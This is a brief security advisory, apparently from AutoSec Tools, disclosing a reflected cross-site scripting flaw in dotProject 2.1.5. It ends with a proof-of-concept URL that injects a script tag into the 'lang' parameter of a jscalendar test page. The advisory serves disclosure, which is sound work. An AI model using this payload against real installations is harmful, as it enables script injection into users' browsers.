dotProject version 2.1.5 suffers from a reflective cross site scripting vulnerability.
98bf49b0dc14873dfc32b9d5dcea1e50a0d9986e6607580d0899f85e8e159b69
------------------------------------------------------------------------
Software................dotProject 2.1.5
Vulnerability...........Reflected Cross-site Scripting
Download................http://sourceforge.net/projects/dotproject/
Release Date............2/2/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------
--Description--
A reflected cross-site scripting vulnerability in dotProject 2.1.5 can
be exploited to execute arbitrary JavaScript.
--PoC--
http://localhost/dotproject/modules/projectdesigner/jscalendar/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert(0)//